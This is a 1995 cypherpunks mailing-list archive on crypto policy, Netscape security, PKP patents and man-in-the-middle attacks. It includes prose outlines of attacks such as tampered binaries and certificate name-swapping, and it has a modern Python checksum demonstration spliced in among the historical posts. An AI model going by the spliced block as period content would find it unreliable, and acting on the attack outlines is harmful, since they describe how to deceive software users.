somewhere.  The only useful alternative is strong encryption of *all* 
messages, an alternative which solves both the nosy-sysadmin problem as well
as stymieing the snooping legal beagles.

~james




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Tue, 10 Oct 95 22:51:12 PDT
To: perry@piermont.com
Subject: Re: java security concerns
In-Reply-To: <199510101500.LAA02245@jekyll.piermont.com>
Message-ID: <199510110550.BAA02068@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> Mike McNally writes:
> >  > I can
> >  > physically remove all the "dangerous" calls from a Postscript
> >  > interpreter and still have it be useful.
> > 
> > I don't see the difference.  An interpreter is an interpreter.
> 
> I suppose most of this is dead obvious to me because I work in
> security every day, but it seems that some otherwise smart people don't
> see the point I'm making, repeatedly.
> 
> As an exercise to the reader compare the following two tasks in
> difficulty.
> 
> 1) Find a bug that lets you execute arbitrary programs unintentionally
>    from a program that contains instances of the 'fork()' system call.
> 
> 2) Find a bug that lets you execute arbitrary programs unintentionally
>    from a  program that contains *no* instances of the 'fork()' system call.

   I agree, however I would point out that not all postscript interpreters
are emasculated (especially those on unix systems like IRIX, they contain
all kinds of calls to fork(), read()/open(), etc). Nothing in the
Java spec tells you that you must call fork() in a Java interpreter
implementation. In fact, Java has nothing to do with the GUI calls, the
network calls, etc. You can support as much or as little system
I/O in a Java implementation as you want. If need be, a Java
implementation could hard code all data needed from a hard disk into 
executable and run entirely in ram, and totally remove all file
system access. (except the implicit one needed to load and run
the executable in the first place) Even Java apps without network
or filesystem capability are useful (as graphic widgets), but I think
at least the ability to load URLs is a good thing, and can be done
in a reasonably secure manner.

  At least from my reading of the Java Language Spec, and Virtual Machine,
there is no requirement that an implementation implement the File I/O
classes. Having a standardized class hierarchy is probably a good idea
though.

-Ray





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rschlafly@attmail.com (Roger  Schlafly)
Date: Wed, 11 Oct 95 01:58:40 PDT
To: cypherpunks@toad.com
Subject: PKP Lawsuit progress report
Message-ID: <rschlafly2840858110>
MIME-Version: 1.0
Content-Type: text/plain



I have a lawsuit against Public Key Partners and RSA Data Security.
(Schlafly v. PKP & RSA, Case C-94-20512 SW PVT.)

(1) PKP has been ordered dissolved by an arbiter.  The MIT patent
returns to RSA Data Security, and the Stanford patents go under the
control of Cylink.  I am happy to report that my lawsuit contributed
to this outcome.

(2) I will soon be deposing:

	Whit Diffie
	Ralph Merkle
	Martin Hellman
	Ron Rivest

I will be asking all the obvious questions.  My purpose is to break
their patents.  Does anyone have anything special for me to ask?
If so, please send me your ideas.

(3) There will be a hearing on the patent validity (and a couple of
annoying technical legal issues) at 10:00 am, Dec. 6, 1995, in the
court of Judge Spencer Williams, Federal Bldg, 280 S. First St,
San Jose CA 95113.  The US court clerk is at 408-291-7783.  It is
open to the public.

Roger Schlafly
rschlafly@attmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpb@miamisci.org (Joe Block)
Date: Tue, 10 Oct 95 23:20:34 PDT
To: m5@dev.tivoli.com (Mike McNally)
Subject: Re: How to hold a key signing party?
Message-ID: <v01520c00aca10da1b732@[199.227.2.129]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 5:59 PM 10/10/95, you wrote:
>Joe Block writes:
> > What I have in mind is to have everyone who is planning on attending send
> > me their key and its fingerprint....
> >
> > This seems like a lot of work, which I don't mind, but if there is a more
> > efficient method, I'd like to know about it.
>
>Doesn't make any difference to me, you nefarious agent of the Great
>Man In The Middle you.
>
>
>
>[ You got to get up *pretty early in the morning* to put one over on
>*me* like that. ]

Each person at the party would confirm what their key signature was so the
other attendees could check their handout.  They then take the handout that
they have personally checked the key signatures on home with them so that
when they receive the keys from yours truly they can compare the
fingerprint they get with the fingerprint the owner claimed for the key,
which they checked against the handout when they were at the party, yes?
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 11 Oct 95 02:23:10 PDT
To: cypherpunks@toad.com
Subject: Checksums for current release versions of Netscape Navigator
Message-ID: <199510110921.CAA29846@ammodump.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

  This file contains checksums for the Netscape Navigator 1.12 and 1.22
distributions and patch files that are available on the Netscape ftp
site under the directory ftp://ftp.netscape.com/netscape/.  This file
has been digitally signed using PGP to assure its authenticity.  The
version of PGP which was used to create the digital signature
on this document was obtained from http://bs.mit.edu:8001/pgp-form.html/.

  This file was signed using my private key.  It can be obtained from
my web page using this URL:

	http://home.netscape.com/people/jsw/my-pgp-key.txt

or by searching for 'jsw@netscape.com' from the PGP key server at mit:

	http://www-swiss.ai.mit.edu/~bal/pks-commands.html#extract

  There are three sets of checksums in this file.  The first set of
checksums uses MD5 to create 128-bit checksums that can not be forged.
The second and third sets of checksums were generated using the two
forms of the unix 'sum' command.  The 'sum' command creates a 16-bit
checksum, which can be used to detect accidental corruption during download,
but is too small to protect you from malicious tampering.

  There are two versions of the checksums for the unix 'sum' command because
unix vendors follow two different standards.  I have labeled the
checksums with the systems that they are good for.  If you are performing
the checksum operation on a unix system that is not listed, check both
lists and make sure that one matches.

	--Jeff

============================================================

These MD5 checksums were generated with the 'md5sum' program from the PGP2.6.2
distribution, which was obtained from http://bs.mit.edu:8001/pgp-form.html/.


============================================================

These checksums were generated using the Unix 'sum' command.  These checksums
are for the form of the sum command that is on SGI IRIX and HPUX systems.


============================================================

These checksums were generated using the Unix 'sum' command.  These checksums
are for the form of the sum command that is on Sun, DEC OSF/1, AIX, BSDI, and
Linux systems.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 11 Oct 95 02:23:35 PDT
To: cypherpunks@toad.com
Subject: Checksums for current beta versions of Netscape Navigator
Message-ID: <199510110921.CAA29849@ammodump.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

  This file contains checksums for the Netscape Navigator 2.0 Beta 1
distribution files that are available on the Netscape ftp
site under the directory ftp://ftp.netscape.com/2.0beta/.  This file
has been digitally signed using PGP to assure its authenticity.  The
version of PGP which was used to create the digital signature
on this document was obtained from http://bs.mit.edu:8001/pgp-form.html/.

  This file was signed using my private key.  It can be obtained from
my web page using this URL:

	http://home.netscape.com/people/jsw/my-pgp-key.txt

or by searching for 'jsw@netscape.com' from the PGP key server at mit:

	http://www-swiss.ai.mit.edu/~bal/pks-commands.html#extract

  There are three sets of checksums in this file.  The first set of
checksums uses MD5 to create 128-bit checksums that can not be forged.
The second and third sets of checksums were generated using the two
forms of the unix 'sum' command.  The 'sum' command creates a 16-bit
checksum, which can be used to detect accidental corruption during download,
but is too small to protect you from malicious tampering.

  There are two versions of the checksums for the unix 'sum' command because
unix vendors follow two different standards.  I have labeled the
checksums with the systems that they are good for.  If you are performing
the checksum operation on a unix system that is not listed, check both
lists and make sure that one matches.

	--Jeff

============================================================

These MD5 checksums were generated with the 'md5sum' program from the PGP2.6.2
distribution, which was obtained from http://bs.mit.edu:8001/pgp-form.html/.


============================================================

These checksums were generated using the Unix 'sum' command.  These checksums
are for the form of the sum command that is on SGI IRIX and HPUX systems.


============================================================

These checksums were generated using the Unix 'sum' command.  These checksums
are for the form of the sum command that is on Sun, DEC OSF/1, AIX, BSDI, and
Linux systems.


Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.
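
The message above publishes separate `sum` lists because the command exists in two incompatible variants. As an added example (not part of the original message and not Netscape's tooling), this Python sketch implements both variants as they are commonly documented, checks a download against a manifest line in either format, and shows on constructed bytes what a 16-bit checksum can and cannot detect; the sample data, the manifest lines, the function names and the use of hashlib's MD5 as the cryptographic digest are assumptions of the example.

```python
import hashlib


def bsd_sum(data):
    """BSD-style `sum`: rotate the 16-bit state right one bit, then add the byte."""
    state = 0
    for byte in data:
        state = (state >> 1) | ((state & 1) << 15)
        state = (state + byte) & 0xFFFF
    return state, (len(data) + 1023) // 1024  # (checksum, 1024-byte blocks)


def sysv_sum(data):
    """System V-style `sum`: add every byte, then fold the total into 16 bits."""
    total = sum(data) & 0xFFFFFFFF
    folded = (total & 0xFFFF) + (total >> 16)
    return (folded & 0xFFFF) + (folded >> 16), (len(data) + 511) // 512


VARIANTS = {"bsd": bsd_sum, "sysv": sysv_sum}


def parse_manifest_line(line):
    """Split '<checksum> <blocks> <path>' as printed by either variant."""
    checksum, blocks, path = line.split(None, 2)
    return int(checksum, 10), int(blocks, 10), path.strip()


def matching_variants(data, manifest_line):
    """Return the names of the variants under which `data` matches the line."""
    want_sum, want_blocks, _ = parse_manifest_line(manifest_line)
    return [name for name, fn in VARIANTS.items()
            if fn(data) == (want_sum, want_blocks)]


# Constructed sample standing in for a release archive (not a real Netscape file).
ORIGINAL = bytes(range(256)) * 9
# Same bytes with the first two swapped: a stand-in for any change made in transit.
MODIFIED = ORIGINAL[1:2] + ORIGINAL[0:1] + ORIGINAL[2:]


def compare(original, candidate):
    """Report which published values would still match the candidate download."""
    sysv_line = "%d %d demo/sample.bin" % sysv_sum(original)
    bsd_line = "%05d %5d demo/sample.bin" % bsd_sum(original)
    return {
        # The additive form ignores byte order, so any reordering passes.
        "sysv_matches": "sysv" in matching_variants(candidate, sysv_line),
        # The rotating form is order-sensitive but still only 16 bits wide.
        "bsd_matches": "bsd" in matching_variants(candidate, bsd_line),
        # A cryptographic digest is what distinguishes the two files reliably.
        "md5_matches": hashlib.md5(candidate).hexdigest()
                       == hashlib.md5(original).hexdigest(),
    }


if __name__ == "__main__":
    print("unchanged download:", compare(ORIGINAL, ORIGINAL))
    print("modified download: ", compare(ORIGINAL, MODIFIED))
```

Both `sum` variants are error-detection codes for line noise and truncated transfers; with only 65,536 possible values, neither says anything about deliberate modification.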




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Tue, 10 Oct 95 18:43:39 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape & Fortessa
Message-ID: <Pine.3.89.9510110202.A28210-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 10 Oct 1995, Hal wrote:

> But hardware is not so simple.  If the only effective way to get
> convenient communications with your net access software became to use a
> hardware token, then it would be a lot easier to put on restrictions.  An
> underground effort to manufacture and distribute tokens would be much
> less practical than one to do the same thing for secure software.

However, as long as the hardware uses a published algorithm, there
shouldn't be too much of a problem in writing a device driver that will
emulate the hardware. Of course, they might attempt to use those tokens to
authenticate the hardware in the application, but that shouldn't be any
harder to patch out than the various software protection schemes that have
fallen in the past.

Frankly, I have no desire to have hardware crypto in my system (nor
anywhere to put it, I'm not wasting a PCMCIA slot on something that I can 
do with software), and unless it's dirt cheap I doubt that many normal
users will want to do so either, particularly if there *is* a software
alternative. Servers might want hardware for performance reasons, but I 
don't see any reason to prefer it otherwise.

So on those grounds, the only real danger would be for the government to
start selling Clipper cards for $5 apiece. Of course, I wouldn't put it
past them....

	Mark






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Campbell <edge@got.net>
Date: Wed, 11 Oct 95 02:52:20 PDT
To: cypherpunks@toad.com
Subject: Re: MITM evasion
Message-ID: <199510111005.DAA25739@you.got.net>
MIME-Version: 1.0
Content-Type: text/plain


The message below (posted earlier today) caught my attention - I believe it
is a (fake?) MITM-generated message, because Tim's sig file has changed
recently (new domain name (got.net) and a disclaimer was added). The sig
attached to this anonymous message is at least a month out of date.

Even if this isn't just a mistake, it's not a true MITM attack, since this
is a third party /not/ between Tim and toad.com ... more of a spoof.

Do I win anything?

>Return-Path: owner-cypherpunks@toad.com
>Date: Wed, 11 Oct 1995 09:55:07 +0100
>Subject: MITM evasion
>To: cypherpunks@toad.com
>Subject: MITM evasion
>From: anon-remailer@utopia.hacktic.nl (Anonymous)

       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

>Organization: Hack-Tic International, Inc.
>Comments: Hack-Tic may or may not approve of the content of this posting
>Comments: Please report misuse of this automated remailing service to
> <postmaster@utopia.hacktic.nl>
>Sender: owner-cypherpunks@toad.com
>
>Two years ago, I pointed out that getting a single message past
>the man in the middle isn't good enough; you have to convince your

                                 Unconvinced, for one ^^^^^^^^

>readers that the key they received on one channel is more accurate
>than the key they're receiving on all the other channels.
>But if they'll believe that, they may also believe the man in the middle's
>announcement that the key in your name on all the keyservers is
>wrong, and the correct key is the one he's putting out.
>Can't win either way, but it's still important to get the key out.
>
>My current key is 0x54696D4D; the fingerprint is 
>4D 65 44 75 53 61 21 2F   41 73 55 64 85 6D 21 7F.

This key isn't registered with the MIT keyserver; not proof in any sense,
but worth mentioning.

>
>..........................................................................
>Timothy C. May         | Crypto Anarchy: encryption, digital money,
>tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
>408-728-0152           | knowledge, reputations, information markets,
>Corralitos, CA         | black markets, collapse of governments.
>Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
>"National borders are just speed bumps on the information superhighway."
>
>
--
   Jay Campbell   Regional Operations Manager
   -=-=-=-=-=-=-  Sense Networking (Santa Cruz Node) 
   edge@got.net   MIT PGP KeyID 0xACAE1A89           
 
"On the Information Superhighway, I'm the guy 
  behind you in this morning's traffic jam leaning on his horn."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 11 Oct 95 02:48:02 PDT
To: cypherpunks@toad.com
Subject: NYT on Internet Flaws
Message-ID: <199510110939.FAA26747@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New York Times, October 11, 1995, pp. A1, D3.

   [Page One]

   Discovery of Internet Flaws Is Setback for On-Line Trade

   By John Markoff


   San Francisco, Oct. 10 -- Newly publicized weaknesses in
   the basic structure of the Internet indicate that the
   worldwide computer network may need a time-consuming
   redesign before it can be safely used as a commercial
   medium.

   The flaws could allow an eavesdropper or criminal to divert
   many types of documents or software programs traveling over
   the Internet, examine or copy or alter them, and then pass
   them on to the intended recipient -- who would have no easy
   way of knowing that the files had been waylaid. Not only
   could electronic mail be read in transit or credit card
   numbers be copied en route, but special security techniques
   meant to protect such transactions could be dismantled
   without the user's knowledge.

   That such security flaws exist is not surprising in a
   system designed originally as a scientific experiment. But
   the recent rush to the Internet by companies seeking to
   exploit its commercial possibilities has obscured the fact
   that giving the system a new purpose has unearthed
   fundamental problems that could well put off true
   commercial viability for years.

   "Companies would have you believe this is a trivial
   problem," said Eric Brewer, a professor of computer science
   at the University of California at Berkeley. "But now there
   is a financial incentive to exploit these flaws and to do
   it secretly."

   The problems were described in a posting that researchers
   at the university made on Monday to several on-line
   discussion groups. While the discussion groups are intended
   for computer security experts, they are potentially
   accessible to millions of Internet users -- including
   break-in artists, who are known to monitor such discussion
   groups for tips on new ways to crack computer systems.

   The researchers who described the Internet weaknesses
   include two Berkeley computer science graduate students who
   noted a security weakness in a popular Netscape
   Communications Corporation software program last month.
   Then as now, the students' stated motivation in publicizing
   the problems was to underscore vulnerabilities facing all
   companies and customers wishing to use the Internet for
   commerce.

   When the Netscape problems were disclosed last month, the
   company said the security flaws would be corrected in the
   next version of its software, which users would be able to
   download at no charge from Netscape's Internet site. But
   the newly publicized flaws in the Internet itself indicate
   that even if a user downloaded a copy of the new, improved
   Netscape program, a criminal could tamper with the copy
   along the way and make it unsafe for use in credit card
   transactions.

   The problem is not Netscape's alone; it potentially affects
   any organization that operates a computer from which files
   or software could be downloaded over the Internet. The
   weakness can be traced to the technical underpinnings of
   the network, which was set up more than a quarter-century
   ago not as a medium for conducting business but as a way
   for academic and scientific researchers to exchange
   information.

   The disclosure of the flaws casts doubt on the aspirations
   of companies like Netscape, which last summer had one of
   the most successful stock offerings in Wall Street history
   based on the promise of the impending arrival of a
   full-fledged on-line marketplace.

   "Companies should take a step back and think about this a
   little more," said Ian Goldberg, one of the Berkeley
   students. "If it takes a bit longer but comes out more
   secure, we will all be better off in the long run."

   The way many Internet systems are set up -- especially the
   Internet's increasingly popular World Wide Web service in
   which software images and even video and audio clips can be
   easily downloaded -- information is stored on a computer
   called a file server and then transferred to a user's
   computer when it is needed.

   The newly publicized weakness occurs in a widely used
   Internet protocol -- or technical standard -- known as the
   Network File System, or NFS. Because NFS does not have any
   means for allowing the recipient of a program or document
   to verify that it has not been altered during transmission
   from the file server to the user, any interception or
   tampering would go undetected.

   "The Internet protocols have been insecure since day one,"
   said Jeffrey I. Schiller, the manager of computer networks
   at the Massachusetts Institute of Technology and director
   of an industry task force that is trying to design a new
   secure version of the Internet.

   But the group's timetable is uncertain, and even when it
   does have recommendations ready, Mr. Schiller is not
   optimistic that the industry will be willing to devote the
   time and money to put them into effect.

   He said that many technologies already exist for improving
   commercial security on the Internet, but many of them
   require too much technical sophistication on the part of
   computer users. He criticized makers of hardware and
   software for not moving more quickly to make easy-to-use
   security features a built-in part of the technology used on
   the Internet.

   "The people who should be the leaders in offering security
   have been too busy counting their money to build these
   features in to their products," Mr. Schiller said.

   Some commercial Internet merchants have tended to play down
   the potential for harm from an illegal interception of
   credit card information over the Internet. They point out
   that consumers routinely make their credit card numbers
   available in transactions done by mail or telephone and
   that the law puts limits on a consumer's liability in cases
   of credit card fraud.

   But Mr. Brewer, the Berkeley professor, said that the
   crucial difference in the proposed Internet commerce
   systems was that for the first time it would be relatively
   simple for a criminal to collect hundreds or thousands of
   credit card numbers. Then a thief could use each credit
   card only one time, making detection much more difficult.

   Sensitive to heightened concerns about security, Wells
   Fargo, the large California bank, which earlier this year
   began permitting customers with personal computers to view
   their account information with the Netscape software,
   suspended the service in September after the Berkeley
   students reported the flaw in Netscape.

   After Netscape followed with an improved version of its
   software, Wells Fargo officials found it secure enough that
   they planned to resume the service later this week. The
   bank will, however, require customers to use the corrected
   version of the Netscape program.

   Even then, Wells Fargo customers will be able only to view
   account balances and other information, but not transfer
   money or conduct other transactions of the type that might
   leave them vulnerable to the Internet NFS weakness.

   "We still hope to be able to offer transactional
   capabilities next year, but this has slowed us down a
   little bit," said Lorna Doubet, a Wells Fargo spokeswoman.
   "Many of our customers feel that security is absolutely
   essential and we have to be cautious in this regard."
             
   Executives at Netscape said yesterday that they were aware
   of the security issues surrounding NFS and would make
   changes in the next release of their software expected
   before the end of the year to permit a recipient of a
   downloaded program to check it for signs of tampering.

   And hoping to take advantage of the fault-finding talents
   of the Berkeley researchers and other like-minded software
   experts, the company announced a contest today called
   Netscape Bugs Bounty, in which Netscape will award prizes
   to users who find bugs or security loopholes in its
   software.

   Some Internet experts said they expected that many security
   weaknesses like the one the Berkeley group had demonstrated
   would be found, because the Internet was simply not
   designed to insure secure commerce.

   "Imagine a walled town or a house," said Noel Chiappa, a
   member of the Internet Engineering Task Force, a
   standards-setting group. "It doesn't matter if 99 windows
   are tight as can be -- if the 100th is wide open, the bad
   guys will bypass your security."

   [End]













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 11 Oct 95 03:25:40 PDT
To: cypherpunks@toad.com
Subject: Enigma
Message-ID: <199510111025.GAA00819@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The NYT reports today on a British best-selling novel about
   breaking the Enigma codes, published this month in the US:

      Enigma, by Robert Harris, Random House.

      Harris interviewed many of the people who worked at
      Bletchley Park, and, most challenging, had to wrestle
      with complex mathematics to explain how the codes were
      broken ... by an elite comprised of an eccentric band of
      British and refugee intellectuals, aided by young women
      carefully picked from upper-class British families.

      So, Mr. Harris was asked, is the book a celebration of
      British amateurism? "There's a bit of that," he
      conceded. "Just as the British benefited from that
      tradition, the Germans were undone by the ruthless
      military efficiency, which made it easier to read their
      messages. The idea of brains taking on brute strength
      does have a certain romantic appeal."

      More than one reviewer said Harris was a thriller writer
      in the British tradition of Eric Ambler, Len Deighton,
      John Le Carre and John Buchan. "Harris has fashioned a
      story that is as humane, intelligent and gripping as
      documentary fiction can get," the critic Anthony Quinn
      wrote in The Financial Times. "This is a story of
      intelligence, romance, twisted logic and necessary
      compromise," Peter Millar wrote in The Times of London,
      adding that it was "altogether top-class stuff."











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@alpha.jpunix.com>
Date: Wed, 11 Oct 95 04:38:24 PDT
To: Mixmaster Mailing List <cypherpunks@toad.com
Subject: Type2.list/pubring.mix
Message-ID: <Pine.BSD.3.91.951011063259.17980A-100000@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Here's the latest!

type2.list

vishnu mixmaster@vishnu.alias.net bb460f08811a98682def423d30852d11 2.0
spook remailer@spook.alias.net ca8c8679f7b1cbdcff46d780fba97673 2.0
flame remailer@flame.alias.net 64bbf500097b541a8ddcb2dd80373238 2.0b11
anon mixmaster@anon.alias.net e3ca4cc5beb9934ae6d52dd27da80332 2.0.2b
secrets secret@secret.alias.net bc2e4251dbddfa74dfae8b274904c2be 2.0.2b
wmono wmono@spook.alias.net f68e6add16880b60eb48a4a4330e2e36 2.0.1
mix mixmaster@obscura.com db91418edac3a4d7329feaee0b79c74f 2.0.1
knight mixmaster@aldebaran.armory.com 6bb0d89a29fd188c67b8e04516b5af33 2.0
robomix robo@c2.org 3d523f1fd30b5a1c57214960a00f1c4e 2.0b11
syrinx syrinx@c2.org 6c4e7372e84d7092e0d0e69c20d5be46 2.0b11
rebma mixer@rebma.mn.org e7d84921298b0aadaf8f050d145ccf03 2.0b11
replay remailer@replay.com e3e2b4d67314b6165ee03b0b0ae07a7f 2.0b11
hacktic remailer@utopia.hacktic.nl bf61835a7b3cfa59c409caeab4e8a222 2.0b11
crynwr remailer@crynwr.com 64c62de6b347b3050fbb6e94c649112d 2.0b11
gondolin mixmaster@gondolin.org 1d767b08fefa0a79d508be73e472d326 2.0.1
q q@c2.org c44e1cb0f0709465c21b07ac972bf973 2.0.1
Armadillo remailer@armadillo.com 7251877ae6fed509ebf7567715974d1b 2.0.1

pubring.mix


 John Perry - KG5RG - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Wed, 11 Oct 95 04:11:29 PDT
To: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Graphic encryption and XV
In-Reply-To: <9510061622.AA02423@ch1d157nwk>
Message-ID: <9510111109.AA19990@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone have patches to XV that allow it to display a PGP
encrypted image without having to explicitly decrypt it first?

--
Rick Busdiecker                        Please do not send electronic junk mail!
 net: rfb@lehman.com or rfb@cmu.edu    PGP Public Key: 0xDBD9994D
 www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html
 send mail, subject "send index" for mailbot info, "send pgp key" gets my key
A `hacker' is one who writes code.  Breaking into systems is `cracking'.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 11 Oct 95 07:16:11 PDT
To: cypherpunks@toad.com
Subject: Mean Men in the Middle
Message-ID: <199510111415.HAA24732@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


If the MITM is really mean, he can overcome some of the suggestions I
offered for how credentials can be used to defeat him.

First, he could cause the user to download bad software.  PGP,
Netscape, and other secure programs could be patched to have holes.
Even the checksum program could be altered so publishing checksums won't
help.  With this attack he would not even need to substitute keys; he
can just make sure that the fake PGP picks guessable session and secret
keys.

Alternatively, he could defeat the use of key certificates which bind names to
keys by the simple stratagem of substituting the name of the user when he
substitutes his keys.  If Alice has all of her posts appearing under
the name of "Bob" unbeknownst to her, then if Bob is the MITM he can get
a certificate and publish it.  All the messages which refer to "Bob" get
changed to refer to "Alice" as they are passed from the net to her,
similar to the key substitution which would also have to be done.  If
Bob's name were a bit unusual this could be done with a simple script.
So even fully valid key certificates may not be effective against MITM
attacks of this type.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Wed, 11 Oct 95 07:55:12 PDT
To: rschlafly@attmail.com
Subject: Re: PKP Lawsuit progress report
Message-ID: <9510111448.AA05691@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


Roger Schlafly sez -=*||
                      \/
> 
> (3) There will be a hearing on the patent validity (and a couple of
> annoying technical legal issues) at 10:00 am, Dec. 6, 1995, in the
> court of Judge Spencer Williams, Federal Bldg, 280 S. First St,
> San Jose CA 95113.  The US court clerk is at 408-291-7783.  It is
> open to the public.

Thanks for letting us know.  I'll be there unless they chain me to
my desk at work;)

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 11 Oct 95 08:25:19 PDT
To: perry@piermont.com
Subject: Re: Netscape & Fortessa
Message-ID: <v02120d0faca198b71d15@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:12 10/11/95, Perry E. Metzger wrote:

>I wasn't aware of that -- I believe that this may have happened
>because those of us who cared didn't attend the zoo in Stockholm. The
>meeting was a complete joke, with the Microsoft people and others
>making it clear that they didn't intend to follow the process. Many of
>us who cared decided to do better things with our time instead of
>showing up in the aptly named Weapons room for the second session.

Unfortunately, I wasn't in Stockholm. I just follow the discussion on the
mailing list.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "K. M. Ellis" <kelli@zeus.towson.edu>
Date: Wed, 11 Oct 95 05:34:49 PDT
To: cypherpunks@toad.com
Subject: Re: NYT on Internet Flaws
In-Reply-To: <199510110939.FAA26747@pipe4.nyc.pipeline.com>
Message-ID: <Pine.ULT.3.91.951011082926.19204C-100000@zeus.towson.edu>
MIME-Version: 1.0
Content-Type: text/plain



This one is _really ripe_ for a response to the editor.  Ideas?

We could start something off-list if there are several interested in 
co-authoring.

-=Kathleen M. Ellis=-

kelli@zeus.towson.edu       Geek Code v3.0      http://zeus.towson.edu/~kelli/
GAT dx s++:- a-- C++ uu+++ P+ L++ E- W++ N K W--- O- M- V-- PS+++ PE- Y++(-)>
PGP+>++ t+ 5 x+ R tv b+++ DI- D--- G e h* r+ z**
Diverse Sexual Orientation Coll.Towson State University DSOC@zeus.towson.edu

"Privacy is stupid."
	-D. Denning





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 11 Oct 95 08:34:22 PDT
To: cypherpunks@toad.com
Subject: [Noise] FWD:Want to trade UNIX skills for Laissez Faire Books?
Message-ID: <v02120d10aca1a1b8e942@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


Given the large number of non-statists on this list, here is a brief
forward FYI:
>--------------------------------------
>Date: 10/11/95 0:34
>From: libernet-d@Dartmouth.EDU
>
>I'm looking for someone to help me with the technical aspects of Laissez
>Faire Books' Internet presence. I need someone who has knowledge of unix
>systems and can modify perl scripts... and has the *time* to do a little
>work on our new Web site. Hopefully this would be the start of an on-going
>relationship.
>
>Most importantly, I'm looking for an enthusiastic libertarian who doesn't
>mind being paid with book credit and a kind "thank you" instead of cash. :-)
>
>Know anyone who might be interested?
>
>Thanks,
>
>Chris
>
>-----------------------------------------------------------------------
>Chris Whitten           Chris@Free-Market.com           Ask me about...

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Wed, 11 Oct 95 05:41:53 PDT
To: cypherpunks@toad.com
Subject: Re: Graphic encryption and XV
In-Reply-To: <9510111109.AA19990@cfdevx1.lehman.com>
Message-ID: <Pine.3.89.9510110828.A91272-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 11 Oct 1995, Rick Busdiecker wrote:

> Does anyone have patches to XV that allow it to display a PGP
> encrypted image without having to explicitly decrypt it first?
XV? Which is?
(Some viewer that runs on X windows?)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Martin Diehl" <mdiehl@dttus.com>
Date: Wed, 11 Oct 95 06:39:46 PDT
To: cypherpunks@toad.com
Subject: Public Awareness of Security
Message-ID: <9509118134.AA813425023@cc2.dttus.com>
MIME-Version: 1.0
Content-Type: text/plain


     On October 11, 1995, John Markoff of the NYTimes writes:
     "Newly publicized weaknesses in the basic structure of the Internet 
     [snip]
     .. advantage of the fault-finding talents of the Berkeley researchers 
